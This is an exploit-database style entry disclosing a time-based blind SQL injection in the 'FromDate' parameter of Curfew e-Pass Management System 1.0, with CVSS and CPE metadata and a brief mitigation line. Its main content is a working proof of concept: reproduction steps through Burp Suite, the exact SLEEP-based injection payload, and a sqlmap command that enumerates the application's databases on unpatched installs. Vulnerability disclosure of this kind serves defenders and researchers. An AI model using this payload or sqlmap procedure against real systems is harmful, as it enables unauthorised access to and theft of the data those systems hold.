Curfew e-Pass Management System 1.0 - FromDate SQL Injection

vendor:

Curfew e-Pass Management System

by:

Puja Dey

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Curfew e-Pass Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:phpgurukul:curfew_e-pass_management_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2023

Curfew e-Pass Management System 1.0 – FromDate SQL Injection

The Curfew e-Pass Management System 1.0 is vulnerable to SQL injection in the 'FromDate' parameter. By injecting a malicious payload into the 'FromDate' parameter, an attacker can manipulate the SQL query to execute arbitrary SQL commands. This vulnerability has been tested with a time-based blind technique using MySQL version 5.0.12.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to sanitize user inputs and prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
Injection
# Date: 28/9/2023
# Exploit Author: Puja Dey
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp

1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent